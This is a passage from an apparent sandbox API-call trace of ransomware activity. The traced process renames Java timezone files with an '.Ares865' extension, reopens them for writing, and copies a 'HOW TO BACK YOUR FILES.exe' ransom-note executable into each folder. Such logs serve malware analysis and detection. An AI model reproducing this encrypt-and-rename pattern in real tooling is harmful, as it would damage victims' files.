dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.802] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=549) returned 1 [0135.805] lstrcpyW (in: lpString1=0x2cce474, lpString2="Catamarca" | out: lpString1="Catamarca") returned="Catamarca" [0135.805] lstrlenW (lpString="Catamarca") returned 9 [0135.805] lstrlenW (lpString="Ares865") returned 7 [0135.805] lstrcmpiW (lpString1="tamarca", lpString2="Ares865") returned 1 [0135.805] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Catamarca.Ares865") returned 75 [0135.805] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Catamarca" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\catamarca"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Catamarca.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\catamarca.ares865"), dwFlags=0x1) returned 1 [0135.814] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Catamarca.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\catamarca.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.815] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=549) returned 1 [0135.818] lstrcpyW (in: lpString1=0x2cce474, lpString2="Cordoba" | out: lpString1="Cordoba") returned="Cordoba" [0135.818] lstrlenW (lpString="Cordoba") returned 7 [0135.818] lstrlenW (lpString="Ares865") returned 7 [0135.818] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Cordoba.Ares865") returned 73 [0135.818] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Cordoba" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\cordoba"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Cordoba.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\cordoba.ares865"), dwFlags=0x1) returned 1 [0135.820] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Cordoba.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\cordoba.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.820] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=549) returned 1 [0135.824] lstrcpyW (in: lpString1=0x2cce474, lpString2="Jujuy" | out: lpString1="Jujuy") returned="Jujuy" [0135.824] lstrlenW (lpString="Jujuy") returned 5 [0135.824] lstrlenW (lpString="Ares865") returned 7 [0135.824] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Jujuy.Ares865") returned 71 [0135.824] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Jujuy" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\jujuy"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Jujuy.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\jujuy.ares865"), dwFlags=0x1) returned 1 [0135.825] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Jujuy.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\jujuy.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.825] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=533) returned 1 [0135.828] lstrcpyW (in: lpString1=0x2cce474, lpString2="La_Rioja" | out: lpString1="La_Rioja") returned="La_Rioja" [0135.828] lstrlenW (lpString="La_Rioja") returned 8 [0135.828] lstrlenW (lpString="Ares865") returned 7 [0135.829] lstrcmpiW (lpString1="a_Rioja", lpString2="Ares865") returned -1 [0135.829] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\La_Rioja.Ares865") returned 74 [0135.829] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\La_Rioja" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\la_rioja"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\La_Rioja.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\la_rioja.ares865"), dwFlags=0x1) returned 1 [0135.831] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\La_Rioja.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\la_rioja.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.831] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=557) returned 1 [0135.834] lstrcpyW (in: lpString1=0x2cce474, lpString2="Mendoza" | out: lpString1="Mendoza") returned="Mendoza" [0135.834] lstrlenW (lpString="Mendoza") returned 7 [0135.834] lstrlenW (lpString="Ares865") returned 7 [0135.834] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Mendoza.Ares865") returned 73 [0135.834] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Mendoza" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\mendoza"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Mendoza.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\mendoza.ares865"), dwFlags=0x1) returned 1 [0135.836] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Mendoza.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\mendoza.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.836] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=549) returned 1 [0135.839] lstrcpyW (in: lpString1=0x2cce474, lpString2="Rio_Gallegos" | out: lpString1="Rio_Gallegos") returned="Rio_Gallegos" [0135.839] lstrlenW (lpString="Rio_Gallegos") returned 12 [0135.839] lstrlenW (lpString="Ares865") returned 7 [0135.839] lstrcmpiW (lpString1="allegos", lpString2="Ares865") returned -1 [0135.839] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Rio_Gallegos.Ares865") returned 78 [0135.839] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Rio_Gallegos" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\rio_gallegos"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Rio_Gallegos.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\rio_gallegos.ares865"), dwFlags=0x1) returned 1 [0135.841] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Rio_Gallegos.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\rio_gallegos.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.841] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=549) returned 1 [0135.845] lstrcpyW (in: lpString1=0x2cce474, lpString2="Salta" | out: lpString1="Salta") returned="Salta" [0135.845] lstrlenW (lpString="Salta") returned 5 [0135.845] lstrlenW (lpString="Ares865") returned 7 [0135.845] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Salta.Ares865") returned 71 [0135.845] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Salta" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\salta"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Salta.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\salta.ares865"), dwFlags=0x1) returned 1 [0135.847] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Salta.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\salta.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.847] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=533) returned 1 [0135.850] lstrcpyW (in: lpString1=0x2cce474, lpString2="San_Juan" | out: lpString1="San_Juan") returned="San_Juan" [0135.850] lstrlenW (lpString="San_Juan") returned 8 [0135.850] lstrlenW (lpString="Ares865") returned 7 [0135.850] lstrcmpiW (lpString1="an_Juan", lpString2="Ares865") returned -1 [0135.851] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\San_Juan.Ares865") returned 74 [0135.851] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\San_Juan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\san_juan"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\San_Juan.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\san_juan.ares865"), dwFlags=0x1) returned 1 [0135.853] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\San_Juan.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\san_juan.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.853] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=557) returned 1 [0135.863] lstrcpyW (in: lpString1=0x2cce474, lpString2="San_Luis" | out: lpString1="San_Luis") returned="San_Luis" [0135.864] lstrlenW (lpString="San_Luis") returned 8 [0135.864] lstrlenW (lpString="Ares865") returned 7 [0135.864] lstrcmpiW (lpString1="an_Luis", lpString2="Ares865") returned -1 [0135.864] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\San_Luis.Ares865") returned 74 [0135.864] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\San_Luis" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\san_luis"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\San_Luis.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\san_luis.ares865"), dwFlags=0x1) returned 1 [0135.866] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\San_Luis.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\san_luis.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.867] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=557) returned 1 [0135.870] lstrcpyW (in: lpString1=0x2cce474, lpString2="Tucuman" | out: lpString1="Tucuman") returned="Tucuman" [0135.870] lstrlenW (lpString="Tucuman") returned 7 [0135.870] lstrlenW (lpString="Ares865") returned 7 [0135.870] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Tucuman.Ares865") returned 73 [0135.870] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Tucuman" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\tucuman"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Tucuman.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\tucuman.ares865"), dwFlags=0x1) returned 1 [0135.872] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Tucuman.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\tucuman.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.872] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=565) returned 1 [0135.875] lstrcpyW (in: lpString1=0x2cce474, lpString2="Ushuaia" | out: lpString1="Ushuaia") returned="Ushuaia" [0135.875] lstrlenW (lpString="Ushuaia") returned 7 [0135.875] lstrlenW (lpString="Ares865") returned 7 [0135.875] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Ushuaia.Ares865") returned 73 [0135.875] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Ushuaia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\ushuaia"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Ushuaia.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\ushuaia.ares865"), dwFlags=0x1) returned 1 [0135.877] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Ushuaia.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\ushuaia.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.877] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=549) returned 1 [0135.880] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa" [0135.880] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa" [0135.880] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0135.880] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\how to back your files.exe"), bFailIfExists=1) returned 0 [0135.881] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0135.881] GetLastError () returned 0x0 [0135.882] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0135.882] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x744e3080, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52fb0940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52fb0940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0135.882] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0135.882] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0135.882] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Abidjan" | out: lpString1="Abidjan") returned="Abidjan" [0135.882] lstrlenW (lpString="Abidjan") returned 7 [0135.882] lstrlenW (lpString="Ares865") returned 7 [0135.882] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Abidjan.Ares865") returned 62 [0135.882] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Abidjan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\abidjan"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Abidjan.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\abidjan.ares865"), dwFlags=0x1) returned 1 [0135.885] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Abidjan.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\abidjan.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.886] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0135.889] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Accra" | out: lpString1="Accra") returned="Accra" [0135.889] lstrlenW (lpString="Accra") returned 5 [0135.889] lstrlenW (lpString="Ares865") returned 7 [0135.889] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Accra.Ares865") returned 60 [0135.889] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Accra" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\accra"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Accra.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\accra.ares865"), dwFlags=0x1) returned 1 [0135.891] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Accra.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\accra.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.891] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=181) returned 1 [0135.894] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Addis_Ababa" | out: lpString1="Addis_Ababa") returned="Addis_Ababa" [0135.894] lstrlenW (lpString="Addis_Ababa") returned 11 [0135.894] lstrlenW (lpString="Ares865") returned 7 [0135.894] lstrcmpiW (lpString1="s_Ababa", lpString2="Ares865") returned 1 [0135.894] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Addis_Ababa.Ares865") returned 66 [0135.894] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Addis_Ababa" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\addis_ababa"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Addis_Ababa.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\addis_ababa.ares865"), dwFlags=0x1) returned 1 [0135.896] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Addis_Ababa.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\addis_ababa.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.896] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0135.900] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Algiers" | out: lpString1="Algiers") returned="Algiers" [0135.900] lstrlenW (lpString="Algiers") returned 7 [0135.900] lstrlenW (lpString="Ares865") returned 7 [0135.900] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Algiers.Ares865") returned 62 [0135.900] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Algiers" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\algiers"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Algiers.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\algiers.ares865"), dwFlags=0x1) returned 1 [0135.901] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Algiers.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\algiers.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.902] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=333) returned 1 [0135.905] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Asmara" | out: lpString1="Asmara") returned="Asmara" [0135.905] lstrlenW (lpString="Asmara") returned 6 [0135.905] lstrlenW (lpString="Ares865") returned 7 [0135.905] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Asmara.Ares865") returned 61 [0135.905] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Asmara" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\asmara"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Asmara.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\asmara.ares865"), dwFlags=0x1) returned 1 [0135.907] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Asmara.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\asmara.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.907] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0135.910] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Bamako" | out: lpString1="Bamako") returned="Bamako" [0135.910] lstrlenW (lpString="Bamako") returned 6 [0135.911] lstrlenW (lpString="Ares865") returned 7 [0135.911] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bamako.Ares865") returned 61 [0135.911] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bamako" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bamako"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bamako.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bamako.ares865"), dwFlags=0x1) returned 1 [0135.913] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bamako.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bamako.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.913] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=85) returned 1 [0135.916] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Bangui" | out: lpString1="Bangui") returned="Bangui" [0135.916] lstrlenW (lpString="Bangui") returned 6 [0135.916] lstrlenW (lpString="Ares865") returned 7 [0135.916] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bangui.Ares865") returned 61 [0135.916] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bangui" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bangui"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bangui.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bangui.ares865"), dwFlags=0x1) returned 1 [0135.918] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bangui.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bangui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.918] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0135.927] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Banjul" | out: lpString1="Banjul") returned="Banjul" [0135.927] lstrlenW (lpString="Banjul") returned 6 [0135.927] lstrlenW (lpString="Ares865") returned 7 [0135.928] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program 